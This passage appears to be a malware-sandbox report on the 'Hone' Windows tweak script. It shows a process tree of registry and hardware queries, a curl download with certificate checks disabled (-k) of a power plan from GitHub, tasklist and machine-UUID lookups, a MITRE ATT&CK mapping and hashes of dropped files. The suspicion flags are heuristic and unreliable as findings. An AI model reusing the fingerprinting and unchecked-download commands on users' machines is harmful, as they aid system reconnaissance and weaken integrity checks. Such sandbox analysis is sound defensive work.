        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:4288
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:3088
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:1028
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:4540
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:2908
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:4244
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:3340
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1984
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:5016
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2816
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:1308
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:4392
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:816
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1840
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:3624
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:64
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:3316
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:1412
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:1180
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:732
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:1616
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:436
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:3440
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:3320
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:4972
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:1604
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:3432
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:3580
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:620
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:4352
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:1860
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:4260
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:3148
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:2956
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:3428
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:3212
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:4560
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:4844
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:1172
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:4060
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:1088
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:3596
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:4056
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:3836
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:3880
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4380
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:5048
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2432
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:2792
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:748
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:1992
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2632
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:1276
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2908
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:4904
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1480
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:4968
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2324
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:4432
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3764
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:2860
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo [91mOFF "
        6⤵
        
        PID:224
      - C:\Windows\system32\find.exe
        
        find "N/A"
        6⤵
        
        PID:1840
      - C:\Windows\system32\curl.exe
        
        curl -g -k -L -# -o "C:\Hone\Resources\HoneV2.pow" "https://github.com/auraside/HoneCtrl/raw/main/Files/HoneV2.pow"
        6⤵
        
        PID:3624
      - C:\Windows\system32\powercfg.exe
        
        powercfg /d 44444444-4444-4444-4444-444444444449
        6⤵
        Power Settings
        
        PID:1548
      - C:\Windows\system32\powercfg.exe
        
        powercfg -import "C:\Hone\Resources\HoneV2.pow" 44444444-4444-4444-4444-444444444449
        6⤵
        Power Settings
        
        PID:1412
      - C:\Windows\system32\powercfg.exe
        
        powercfg /changename 44444444-4444-4444-4444-444444444449 "Hone Ultimate Power Plan V2" "The Ultimate Power Plan to increase FPS, improve latency and reduce input lag."
        6⤵
        Power Settings
        
        PID:532
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic cpu get numberOfCores /value
        6⤵
        
        PID:732
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get numberOfCores /value
        7⤵
        
        PID:2220
      - C:\Windows\system32\powercfg.exe
        
        powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
        6⤵
        Power Settings
        
        PID:4236
      - C:\Windows\system32\powercfg.exe
        
        powercfg -setacvalueindex 44444444-4444-4444-4444-444444444449 sub_processor IDLEDISABLE 0
        6⤵
        Power Settings
        
        PID:796
      - C:\Windows\system32\powercfg.exe
        
        powercfg -setactive "44444444-4444-4444-4444-444444444449"
        6⤵
        Power Settings
        
        PID:3448
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:2904
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:4356
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:536
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:4228
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:2888
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4260
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:1288
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:2956
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:1972
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:3928
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:4640
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4524
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:4944
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:1572
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:3292
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:2300
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:2628
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:3012
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:2772
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:4804
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:1820
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:4592
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:5012
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:2448
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1396
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:4956
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:4428
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:3548
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4540
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:2032
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:1984
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:3328
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:4076
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:2104
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:3356
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:2840
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:3964
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:4572
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:4392
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:640
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:4344
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:2388
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:1836
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:1128
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:2536
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:1660
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:1948
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:4824
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:456
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:856
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:4920
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:4152
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:888
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:1840
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:924
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:3316
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:1412
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:1316
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:1000
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:2220
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:796
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:4628
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3448
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:3512
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1852
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:4828
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:412
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:3580
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4312
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:2156
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:5044
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:4476
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2464
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:1104
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3928
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:2956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2136
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4816

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:2016

C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
1⤵
PID:3080

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3922855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2860

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Power Settings

T1653

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
71fa55c67a762ba70e40011153e19b3c

SHA1
a36d2bb4802a8ec7db1a68de5f0c3d6007987492

SHA256
b8be6896ca89d3ebe9ee8a94e3407483f4750badaf7fa33526817cfc926dc291

SHA512
32760af7c05e20fec8cbddf56c2df544a69335f930f1d313cd1fdceaa90ed2afe81e54ac1b6770097d6f5ca5f30955f95970171a453579aa19239a17aaefe47f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
793B

MD5
75f2e292d81f1ab0a36bff21b876900f

SHA1
723d3e6c59dc37ab806620e745511bb0972ef730

SHA256
d2a9ea5c639ebd101926ca6822a38deb8f68991a8056f99fa9192566c22d7e9c

SHA512
9c45ca9aa6eb16a607e4e9da683e91edcd2138c83b888daee69d3f3bb6a0d1d5a75c3808330965856a07b82e0990c464bb748faff18941b263d820cfc31164a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7501.tmp\7512.tmp\7513.bat

Filesize
184KB

MD5
dac3246a897d2448c4b572f5a159cd0d

SHA1
15ff4f8282940fd6e448dcd2a1cb82ba1eab3a13

SHA256
1605c33720463f5d1fa2ca95c4904081df6caf5a26c98dab221244be293cb4bc

SHA512
907c5bab48430b9bfcff63fac115d11bb8db28fda73ed3fc5320f3b90396ef5d3d4dc39cb274c04530cc659329aa05833f668fde5b8c6d783f183346f0fa26ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\AppxProvider.dll

Filesize
554KB

MD5
a7927846f2bd5e6ab6159fbe762990b1

SHA1
8e3b40c0783cc88765bbc02ccc781960e4592f3f

SHA256
913f97dd219eeb7d5f7534361037fe1ecc3a637eb48d67b1c8afa8b5f951ba2f

SHA512
1eafece2f6aa881193e6374b81d7a7c8555346756ed53b11ca1678f1f3ffb70ae3dea0a30c5a0aab8be45db9c31d78f30f026bb22a7519a0930483d50507243f

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\AssocProvider.dll

Filesize
112KB

MD5
94dc379aa020d365ea5a32c4fab7f6a3

SHA1
7270573fd7df3f3c996a772f85915e5982ad30a1

SHA256
dc6a5930c2b9a11204d2e22a3e8d14c28e5bdac548548e256ba7ffa79bd8c907

SHA512
998fd10a1f43024a2398491e3764748c0b990b37d8b3c820d281296f8da8f1a2f97073f4fd83543994a6e326fa7e299cb5f59e609358cd77af996175782eeaca

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\CbsProvider.dll

Filesize
875KB

MD5
6ad0376a375e747e66f29fb7877da7d0

SHA1
a0de5966453ff2c899f00f165bbff50214b5ea39

SHA256
4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f

SHA512
8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\DismCore.dll

Filesize
402KB

MD5
b1f793773dc727b4af1648d6d61f5602

SHA1
be7ed4e121c39989f2fb343558171ef8b5f7af68

SHA256
af7f342adf5b533ea6978b68064f39bfb1e4ad3b572ae1b7f2287f5533334d4e

SHA512
66a92bff5869a56a7931d7ed9881d79c22ba741c55fb42c11364f037e1ec99902db2679b67a7e60cbf760740d5b47dcf1a6dcfae5ad6711a0bd7f086cc054eed

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\DismCorePS.dll

Filesize
183KB

MD5
a033f16836d6f8acbe3b27b614b51453

SHA1
716297072897aea3ec985640793d2cdcbf996cf9

SHA256
e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e

SHA512
ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\DismHost.exe

Filesize
142KB

MD5
e5d5e9c1f65b8ec7aa5b7f1b1acdd731

SHA1
dbb14dcda6502ab1d23a7c77d405dafbcbeb439e

SHA256
e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80

SHA512
7cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\LogProvider.dll

Filesize
77KB

MD5
815a4e7a7342224a239232f2c788d7c0

SHA1
430b7526d864cfbd727b75738197230d148de21a

SHA256
a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2

SHA512
0c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\OSProvider.dll

Filesize
149KB

MD5
db4c3a07a1d3a45af53a4cf44ed550ad

SHA1
5dea737faadf0422c94f8f50e9588033d53d13b3

SHA256
2165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758

SHA512
5182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\dismprov.dll

Filesize
255KB

MD5
490be3119ea17fa29329e77b7e416e80

SHA1
c71191c3415c98b7d9c9bbcf1005ce6a813221da

SHA256
ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a

SHA512
6339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\en-US\AppxProvider.dll.mui

Filesize
22KB

MD5
bd0dd9c5a602cb0ad7eabc16b3c1abfc

SHA1
cede6e6a55d972c22da4bc9e0389759690e6b37f

SHA256
8af0073f8a023f55866e48bf3b902dfa7f41c51b0e8b0fe06f8c496d41f9a7b3

SHA512
86351dc31118fc5a12fad6f549aa60c45ebe92b3ce5b90376e41f60d6d168a8a9f6c35320fc2cdcc750e67a5751651657fe64cf42690943500afd0d1dae2cd0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\91562B9E-D0F9-44C9-AE30-F0502E34EE55\en-US\AssocProvider.dll.mui

Filesize
8KB

MD5
8833761572f0964bdc1bea6e1667f458

SHA1
166260a12c3399a9aa298932862569756b4ecc45

SHA256
b18c6ce1558c9ef6942a3bce246a46557c2a7d12aec6c4a07e4fa84dd5c422f5

SHA512
2a907354ec9a1920b9d1d2aeb9ff7c7314854b36a27f7d88aca17825e74a87413dbe7d1c3fde6a2410b5934f8c80a76f8bb6b7f12e7cfc643ce6622ca516d9b8

Download Submit
